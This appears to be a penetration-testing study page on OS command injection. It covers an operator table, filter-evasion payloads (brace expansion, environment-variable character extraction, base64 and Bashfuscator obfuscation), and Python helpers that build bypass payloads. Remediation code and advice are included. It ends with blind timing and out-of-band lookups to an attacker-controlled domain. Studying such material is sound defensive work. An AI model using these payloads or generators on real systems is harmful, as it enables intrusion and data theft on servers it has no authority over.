# Command injection

{% hint style="info" %}
Command injection operators. "Executed Command" says which side of the operator actually runs. All of them work in Linux bash and Windows PowerShell; in Windows cmd.exe the semicolon is not a command separator, and the two sub-shell forms are bash-only.
{% endhint %}

| **Injection Operator** | **Injection Character** | **URL-Encoded Character** | **Executed Command**                       |
| ---------------------- | ----------------------- | ------------------------- | ------------------------------------------ |
| Semicolon              | `;`                     | `%3b`                     | Both (not in cmd.exe)                      |
| New Line               | `\n`                    | `%0a`                     | Both                                       |
| Background             | `&`                     | `%26`                     | Both (second output generally shown first) |
| Pipe                   | `\|`                    | `%7c`                     | Both (only second output is shown)         |
| AND                    | `&&`                    | `%26%26`                  | Both (only if first succeeds)              |
| OR                     | `\|\|`                  | `%7c%7c`                  | Second (only if first fails)               |
| Sub-Shell              | ` `` `                  | `%60%60`                  | Both (Linux-only)                          |
| Sub-Shell              | `$()`                   | `%24%28%29`               | Both (Linux-only)                          |

{% hint style="info" %}
Injection operators are not unique to command injection: SQL, LDAP, XPath, XSS, SSRF, XML and other injection classes each have their own. The most common operators per injection type:
{% endhint %}

| **Injection Type**                      | **Operators**                                     |
| --------------------------------------- | ------------------------------------------------- |
| SQL Injection                           | `'` `,` `;` `--` `/* */`                          |
| Command Injection                       | `;` `&&`                                          |
| LDAP Injection                          | `*` `(` `)` `&` `\|`                              |
| XPath Injection                         | `'` `or` `and` `not` `substring` `concat` `count` |
| OS Command Injection                    | `;` `&` `\|`                                      |
| Code Injection                          | `'` `;` `--` `/* */` `$()` `${}` `#{}` `%{}` `^`  |
| Directory Traversal/File Path Traversal | `../` `..\\` `%00`                                |
| Object Injection                        | `;` `&` `\|`                                      |
| XQuery Injection                        | `'` `;` `--` `/* */`                              |
| Shellcode Injection                     | `\x` `\u` `%u` `%n`                               |
| Header Injection                        | `\r`  `%0d` `%0a` `%09`                           |

{% embed url="https://academy.hackthebox.com/course/preview/whitebox-pentesting-101-command-injection" %}

<https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#bypass-without-space>

**Bypass spaces**

Bash brace expansion re-inserts the spaces for you: `{ls,-la}` is expanded to `ls -la` before the command runs, so the request never has to contain a space (or `%20`). A URL-encoded tab (`%09`) also separates arguments on Linux. Do not leave a trailing comma in the group: `{ls,-la,}` expands to an extra empty argument and `ls` fails on `''`.

{% hint style="info" %}
ip=127.0.0.1%0a{ls,-la}

ip=127.0.0.1%0a{ls,-la,${PATH:0:1}home${PATH:0:1}}
{% endhint %}

**Bypass stripped or blacklisted slashes (and other characters)**

When a filter removes or blocks `/` or `;`, take the character out of an environment variable with bash substring expansion `${VAR:offset:length}`:

```shell-session
$ echo ${PATH:0:1}
/
$ echo ${LS_COLORS:10:1}
;
```

`PATH` starts with `/` on practically every Linux host. `LS_COLORS` yields `;` at offset 10 only when it starts with the common default `rs=0:di=01;34:...`, so check the real value before relying on it. `printenv` prints all environment variables; look for one that contains the character you need, then shorten the expression until it produces that single character. `/` (to build paths) and `;` (as the injection operator) are the two you most often need.

Windows cmd uses `%VAR:~start,length%`. `HOMEPATH` is `\Users\<name>`, so the `6,-11` offsets below depend on the user name being 11 characters; `%HOMEPATH:~0,1%` returns the leading backslash regardless:

```shell-session
C:\> echo %HOMEPATH:~6,-11%
\
```

Windows PowerShell indexes the string directly:

```shell-session
PS C:\> $env:HOMEPATH[0]
\
```
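The printenv-and-shorten procedure above, automated. This is an added example for this page, not HTB Academy code: given an environment, it finds a `${VAR:offset:1}` expression that expands to a wanted character, rewrites a command so the filtered characters never appear literally, and then expands the result the way bash would so the payload can be checked before it is sent. `SAMPLE_ENV` is a constructed environment modelled on a default Debian shell; the same functions take `os.environ` on a live box.

```python
"""
Added example (not HTB Academy code): automate "printenv, find the character,
shorten to ${VAR:offset:1}" and verify the resulting payload offline.
"""
import os
import re
from typing import Dict, Optional

# Constructed sample environment; on a real target use whatever printenv shows.
SAMPLE_ENV: Dict[str, str] = {
    "PATH": "/usr/local/bin:/usr/bin:/bin",
    "HOME": "/home/htb-student",
    "LS_COLORS": "rs=0:di=01;34:ln=01;36:mh=00:pi=40;33",
    "SHELL": "/bin/bash",
}

# ${NAME:offset:length} as bash parses it (no negative offsets, which bash
# treats differently and which this payload style never needs).
SUBSTR = re.compile(r"\$\{([A-Za-z_][A-Za-z0-9_]*):(\d+):(\d+)\}")


def find_char_expr(wanted: str, env: Dict[str, str]) -> Optional[str]:
    """First `${VAR:offset:1}` whose expansion is `wanted`, or None if no
    variable contains it (that character cannot be produced this way)."""
    for name, value in env.items():
        offset = value.find(wanted)
        if offset != -1:
            return f"${{{name}:{offset}:1}}"
    return None


def rewrite(command: str, banned: str, env: Dict[str, str]) -> str:
    """Replace every banned character in `command` with an env-var substring.
    Raises ValueError if some banned character is nowhere in the environment."""
    out = []
    for ch in command:
        if ch in banned:
            expr = find_char_expr(ch, env)
            if expr is None:
                raise ValueError(f"no environment variable contains {ch!r}")
            out.append(expr)
        else:
            out.append(ch)
    return "".join(out)


def expand(text: str, env: Dict[str, str]) -> str:
    """Expand `${VAR:offset:length}` like bash (unset variable -> empty string),
    so a rewrite() result can be checked against the intended command."""
    def sub(m):
        name, offset, length = m.group(1), int(m.group(2)), int(m.group(3))
        return env.get(name, "")[offset:offset + length]
    return SUBSTR.sub(sub, text)


if __name__ == "__main__":
    cmd = "cat /home/htb-student/flag.txt"
    payload = rewrite(cmd, "/", SAMPLE_ENV)
    print(payload)   # cat ${PATH:0:1}home${PATH:0:1}htb-student${PATH:0:1}flag.txt
    print(expand(payload, SAMPLE_ENV) == cmd)   # True
    print(find_char_expr(";", SAMPLE_ENV))      # ${LS_COLORS:10:1}
    # Same search against the live environment instead of the constructed one:
    print(find_char_expr(";", dict(os.environ)))
```

Spaces are the one character this cannot usually supply (no default variable contains one), which is why the brace-expansion and tab tricks exist.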

**Character filter bypass and obfuscation**

Quotes split a blacklisted word without changing what bash runs (`c'a't` and `c"a"t` both execute `cat`; the number of quote characters must be even):

```shell-session
127.0.0.1%0a{c'a't,${PATH:0:1}home${PATH:0:1}1nj3c70r${PATH:0:1}flag.txt}
```

Case manipulation and reversing defeat case-sensitive word filters; the inner command runs first and its output is substituted as the command to execute:

```shell-session
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")
$(rev<<<'imaohw')
```

Base64 keeps every filtered character out of the request; bash decodes the here-string and executes the result. The only space left, between `base64` and `-d`, is sent as a URL-encoded tab (`%09`):

```shell-session
# find /usr/share/ | grep root | grep mysql | tail -n 1
echo -n 'find /usr/share/ | grep root | grep mysql | tail -n 1' | base64
bash<<<$(base64%09-d<<<ZmluZCAvdXNyL3NoYXJlLyB8IGdyZXAgcm9vdCB8IGdyZXAgbXlzcWwgfCB0YWlsIC1uIDE=)
```

Bashfuscator generates heavily obfuscated equivalents automatically. Below, `cat /etc/passwd` obfuscated: the array `W0` holds the characters and the index list spells the command:

```shell-session
git clone https://github.com/Bashfuscator/Bashfuscator
# cat /etc/passwd
bash -c 'eval "$(W0=(w \  t e c p s a \/ d);for Ll in 4 7 2 1 8 3 2 4 8 5 7 6 6 0 9;{ printf %s "${W0[$Ll]}";};)"'
```

Final assessment request (`&` as `%26` is the injection operator; `Y2F0IC9mbGFnLnR4dA==` decodes to `cat /flag.txt`):

```shell-session
GET /index.php?to=tmp%26bash<<<$(base64%09-d<<<Y2F0IC9mbGFnLnR4dA==)&from=flag.txt&finish=1&move=1 HTTP/1.1
```
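A payload builder for the space bypass and the base64 wrapping described in the two sections above. This is an added example for this page, not HTB Academy or PayloadsAllTheThings code: it turns a command into a brace-expansion group, shows what bash makes of such a group (including the trailing-comma mistake), wraps a command in the `bash<<<$(base64 -d<<<...)` form with a tab instead of the space, and percent-encodes the final `ip=` value. Brace expansion and the tab trick assume a bash target; the `ip=` parameter name is an assumption.

```python
"""
Added example (not from the page, HTB Academy or PayloadsAllTheThings):
build and verify space-free / base64-wrapped command injection payloads.
"""
import base64
import re
import shlex
from typing import List
from urllib.parse import quote

# Characters the page's payloads keep literal; space, tab, newline, & and
# the rest are percent-encoded.
KEEP = "{},$()<="


def brace_group(command: str) -> str:
    """`ls -la /tmp` -> `{ls,-la,/tmp}`. Bash brace expansion puts the spaces
    back, so the request never contains one. A comma inside an argument would
    be split again, so refuse it."""
    words = shlex.split(command)
    if len(words) < 2 or any("," in w for w in words):
        raise ValueError("need two or more comma-free words for a brace group")
    return "{" + ",".join(words) + "}"


def bash_brace_words(group: str) -> List[str]:
    """What bash produces for one `{a,b,...}` group: a group without a comma
    stays literal, and an empty element (`{ls,-la,}`) becomes an empty
    argument, which is why that variant makes ls complain about ''."""
    m = re.fullmatch(r"\{([^{}]*)\}", group)
    if not m or "," not in m.group(1):
        return [group]
    return m.group(1).split(",")


def b64_wrapped(command: str) -> str:
    """Ship the whole command base64-encoded so no operator, quote or slash
    reaches the filter; bash decodes it from a here-string. The remaining
    separator between `base64` and `-d` is a tab, which encodes to %09."""
    b64 = base64.b64encode(command.encode()).decode()
    return f"bash<<<$(base64\t-d<<<{b64})"


def unwrap_b64(payload: str) -> str:
    """Recover the command from a b64_wrapped() payload to double-check it."""
    m = re.search(r"<<<([A-Za-z0-9+/=]+)\)", payload)
    if not m:
        raise ValueError("not a base64 here-string payload")
    return base64.b64decode(m.group(1)).decode()


def query_value(target: str, injected: str) -> str:
    """`ip=` value: the expected input, the newline operator (%0a), then the
    injected command, percent-encoded like the examples above."""
    return quote(f"{target}\n{injected}", safe=KEEP)


if __name__ == "__main__":
    print("ip=" + query_value("127.0.0.1", brace_group("ls -la")))   # ip=127.0.0.1%0A{ls,-la}
    print(bash_brace_words("{ls,-la,}"))                             # ['ls', '-la', '']
    cmd = "find /usr/share/ | grep root | grep mysql | tail -n 1"
    wrapped = b64_wrapped(cmd)
    print("ip=" + query_value("127.0.0.1", wrapped))
    print(unwrap_b64(wrapped) == cmd)                                # True
```

`quote()` emits upper-case hex (`%0A`, `%09`); the server decodes both cases identically, so the lower-case forms on this page are interchangeable with them.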

**Recommendations:**

The primary fix is not to hand user input to a shell at all: invoke the program directly with an argument list (execve-style APIs rather than `system()`/`shell_exec()`), and validate the input against an allow-list (an IP address must parse as an IP address). Blacklist filters are not a fix; every bypass above defeats one. In addition, the back-end server should be configured to reduce the impact if the web application is compromised anyway:

* Use the web server's WAF module (e.g., in Apache `mod_security`) in addition to an external WAF (e.g., Cloudflare, Fortinet, Imperva).
* Abide by the Principle of Least Privilege (PoLP): run the web server as a low-privileged user (e.g., `www-data`).
* Prevent dangerous functions from being executed by the web server (e.g., in PHP `disable_functions = system,...`).
* Limit the scope accessible to the web application to its own folder (e.g., in PHP `open_basedir = '/var/www/html'`).
* Reject double-encoded requests and non-ASCII characters in URLs.
* Avoid sensitive or outdated libraries and modules (e.g., PHP CGI).
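The vulnerable pattern the payloads on this page exploit, next to the two fixes the recommendations point at. This is an added example, not code from the page or from HTB Academy; `echo` stands in for the `ping` that a host-check form would shell out to, so it runs anywhere with `/bin/sh`.

```python
"""
Added example (not HTB Academy code): a shelled-out host check, vulnerable,
shell-quoted, and hardened with allow-list validation plus no shell.
"""
import ipaddress
import shlex
import subprocess


def check_host_vulnerable(host: str) -> str:
    # String building + shell=True: /bin/sh parses the user's text, so every
    # operator in the table above (; & | && || backticks $()) is live.
    cmd = f"echo pinging {host}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def check_host_quoted(host: str) -> str:
    # If a shell is unavoidable, shlex.quote() makes the value one literal word:
    # "127.0.0.1; id" is echoed back, not executed. The text still reaches the
    # program, so this does not stop argument injection (a value starting "-").
    cmd = f"echo pinging {shlex.quote(host)}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def check_host_hardened(host: str) -> str:
    # 1. Allow-list validation: the value must parse as an IP address.
    #    ValueError for "127.0.0.1; id", "127.0.0.1\n{ls,-la}", "${PATH:0:1}"...
    ipaddress.ip_address(host)
    # 2. No shell: the argv list goes to execve(2) directly; nothing re-parses it.
    return subprocess.run(["echo", "pinging", host],
                          capture_output=True, text=True).stdout


def rejects(func, host: str) -> bool:
    """True if `func` refuses `host` (ValueError) instead of running it."""
    try:
        func(host)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    payload = "127.0.0.1; id"                    # ';' operator from the table above
    print(check_host_vulnerable(payload))        # second line is the output of id
    print(check_host_quoted(payload))            # 'pinging 127.0.0.1; id' as text
    print(rejects(check_host_hardened, payload)) # True: never reaches execve
    print(check_host_hardened("127.0.0.1"))
```

The same split applies to PHP: `escapeshellarg()` plays the role of `shlex.quote()`, while `disable_functions` and `open_basedir` from the list above only limit what an injection can do once it has happened.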

**Blind command injection** (no command output in the response): inject a delay and compare response times. `ping -c 10 127.0.0.1` takes about 9 seconds; `sleep 10` works as well:

```shell-session
127.0.0.1 && ping -c 10 127.0.0.1 &
```

**Out-of-band**: make the target resolve a hostname on a DNS server you control and watch for the lookup (replace `kgj2.web-atacker.com` with your own domain, using a unique subdomain per request so a hit can be matched to the injection point):

```shell-session
127.0.0.1 & nslookup kgj2.web-atacker.com &
```
